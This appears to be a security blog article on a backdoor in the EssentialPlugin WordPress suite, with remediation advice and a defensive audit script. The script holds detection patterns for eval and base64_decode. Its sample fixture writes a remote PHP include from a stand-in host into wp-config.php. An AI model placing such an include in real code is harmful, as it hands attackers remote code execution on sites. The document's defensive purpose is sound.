WordPress EssentialPlugin Suite Hacked to Push Malware
30+ WordPress plugins in the EssentialPlugin package were backdoored to push malware via updates. Here's what happened and how to protect your site.
WordPress EssentialPlugin Backdoor Exposes Thousands of Sites
Over 30 WordPress plugins in the EssentialPlugin package have been compromised with a backdoor that allows attackers to silently inject malware into sites running them. The WordPress plugin supply chain attack affected plugins with hundreds of thousands of active installs, and the malicious code sat dormant since August 2025 before being activated recently to push spam pages, redirects, and fake content.
Austin Ginder, founder of managed WordPress host Anchor Hosting, spotted the issue after receiving a tip about suspicious third-party access code in one plugin. A deeper audit revealed the same backdoor across the entire EssentialPlugin suite, tracing back to a six-figure acquisition of the project by a new owner last year.
How the Backdoor Works
The attack chain is deceptively clean. The backdoor stayed inactive after being planted, waiting for a signal from a remote endpoint at analytics.essentialplugin.com. Once that endpoint returned a malicious serialized payload, the code fetched an external file named wp-comments-posts.php (note: not the legitimate wp-comments-post.php) and injected it into wp-config.php.
What makes this particularly nasty is the evasion strategy. The injected malware uses Ethereum-based C2 address resolution to avoid traditional domain blocklists. The spam content it serves is only shown to Googlebot, making it completely invisible to site owners during normal browsing. Administrators could have been unknowingly running SEO-poisoning malware for months without any visible symptoms.
Patchstack confirmed the backdoor would only execute if the EssentialPlugin analytics endpoint returned a specifically crafted malicious response, meaning the attacker had fine-grained control over when and where the payload activated.
What's at Risk for Developers
The blast radius here is significant. The EssentialPlugin brand (originally WP Online Support, rebranded in 2021) covers sliders, galleries, WooCommerce extensions, SEO tools, and marketing utilities. If any of those plugins are running on a client's site, the compromise potentially exposed database credentials and site configuration through wp-config.php.
WordPress.org responded by closing the affected plugins and forcing an update to neutralize the backdoor's communication path. But here's the catch: the forced update does not clean wp-config.php. Sites that were actively infected still need manual remediation. The WordPress Plugins Team also warned that the malware may exist in files beyond the known wp-comments-posts.php location, meaning a single file check is not enough.
How to Protect Your WordPress Sites
If you run any EssentialPlugin products, treat the environment as compromised until proven otherwise. These steps matter right now:
- Audit wp-config.php immediately. Look for injected code that wasn't there before, especially anything referencing external domains or serialized data.
- Search for wp-comments-posts.php. Delete it if found. It is not a legitimate WordPress core file.
- Scan all plugin files for unknown code. The malware may be hiding elsewhere. A full automated scan can surface unexpected file modifications and suspicious outbound connections.
- Check server logs for Googlebot traffic patterns. If Googlebot is hitting unusual pages, the spam injection may already be active.
- Replace affected plugins entirely. Don't just update. Remove, reinstall from a trusted source, or switch to an alternative.
- Rotate database credentials stored in wp-config.php as a precaution.
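The first four checks above can be scripted. The following is an added example, not code from the article or from the EssentialPlugin project; it assumes a standard WordPress tree under a given root and a combined-format access log (request path in field 7, user agent in quotes), and it builds a constructed sample site and log to run against.

```shell
#!/bin/sh
# Added example, not code from the article or the EssentialPlugin project.
# Assumes a standard WordPress tree under the given root and a combined-format
# access log (user agent quoted, request path in field 7); both are assumptions.

# 1. Flag lines in wp-config.php that a clean config never needs: external
#    URLs, serialized-data handling, obfuscation helpers, the rogue file name.
audit_wp_config() {
  cfg="$1/wp-config.php"
  [ -f "$cfg" ] || { echo "missing: $cfg" >&2; return 2; }
  ! grep -nE 'https?://|unserialize\(|base64_decode\(|eval\(|wp-comments-posts' "$cfg"
}

# 2. The dropped file is one letter off from core's wp-comments-post.php.
find_rogue_file() {
  find "$1" -type f -name 'wp-comments-posts.php'
}

# 3. Cloaked spam is served only to Googlebot, so paths that appear in the log
#    exclusively under a Googlebot user agent deserve a manual look.
googlebot_only_paths() {
  g=$(mktemp); o=$(mktemp)
  grep -i  'Googlebot' "$1" | awk '{print $7}' | sort -u > "$g"
  grep -iv 'Googlebot' "$1" | awk '{print $7}' | sort -u > "$o"
  comm -23 "$g" "$o"
  rm -f "$g" "$o"
}

# Constructed sample site and log (not real data) to exercise the checks.
build_sample_site() {
  root=$(mktemp -d)
  printf "<?php\ndefine('DB_NAME', 'wp');\n" > "$root/wp-config.php"
  printf "include 'https://example.invalid/wp-comments-posts.php';\n" >> "$root/wp-config.php"
  mkdir -p "$root/wp-content/uploads" && : > "$root/wp-content/uploads/wp-comments-posts.php"
  : > "$root/index.php"
  cat > "$root/access.log" <<'EOF'
203.0.113.5 - - [01/Mar/2026:10:00:00 +0000] "GET /about/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
66.249.66.1 - - [01/Mar/2026:10:01:00 +0000] "GET /about/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
66.249.66.1 - - [01/Mar/2026:10:02:00 +0000] "GET /cheap-pharma-deals/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
EOF
  echo "$root"
}

root=$(build_sample_site)
audit_wp_config "$root" || echo "wp-config.php: suspicious lines printed above"
find_rogue_file "$root"
googlebot_only_paths "$root/access.log"
```

Point the three functions at a real document root and access log to use them on a production host; the Googlebot heuristic only surfaces candidates, so review each path before acting.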
For ongoing coverage of WordPress plugin vulnerabilities, see our WordPress security blog.
FAQ
How do I know if my site was actively infected, not just vulnerable?
Check wp-config.php for unfamiliar injected code and look for the file wp-comments-posts.php in your WordPress root. Also review server access logs for unusual Googlebot requests to pages that don't exist in your CMS.
Does removing the plugin remove the malware?
No. The backdoor writes to wp-config.php, which persists after plugin removal. You need to manually inspect and clean that file even after deactivating or deleting the plugin.
Why did WordPress.org's forced update not fully clean infected sites?
The forced update closed the communication channel and disabled the backdoor's execution path, but WordPress.org does not modify core configuration files like wp-config.php during plugin updates. That remediation has to happen manually at the server level.